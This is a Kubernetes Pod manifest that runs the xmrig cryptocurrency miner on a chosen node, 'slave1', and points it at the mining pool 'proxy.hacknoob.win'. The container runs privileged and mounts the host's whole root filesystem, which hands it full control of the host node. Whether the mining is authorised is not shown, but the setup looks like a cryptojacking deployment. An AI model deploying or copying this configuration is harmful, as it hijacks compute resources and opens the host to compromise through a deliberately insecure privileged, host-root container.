apiVersion: v1
kind: Pod
metadata:
  name: xmrig-exec-1
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: kubernetes.io/hostname
            operator: In
            values:
            - slave1
  containers:
  - name: xmrig-container-1
    image: debian:bullseye-slim  # Using a Debian Slim image
    command:
    - /bin/bash
    - -c
    - |
      # Update package list and install necessary tools
      apt-get update && \
      apt-get install -y zram-tools && \
      # Run xmrig from the provided path
      /home/worker1/xmrig/build/xmrig \
      -o proxy.hacknoob.win:5551 \
      -u slave1+150 \
      -a rx/0 \
      --threads "1" \
      --no-huge-pages \
      --cpu-priority "5" \
      --donate-level "0"
    resources:
      limits:
        memory: "257Mi"   # Adjust the memory limit if needed
        cpu: "500m"       # Limit to half a CPU core
    volumeMounts:
    - name: xmrig-volume-1
      mountPath: /  # Mount the entire / path
    securityContext:
      privileged: true  # Allow privileged mode
  restartPolicy: Always   # Ensure the pod automatically restarts on failure
  volumes:
  - name: xmrig-volume-1
    hostPath:
      path: /  # Mount / from the host to the container

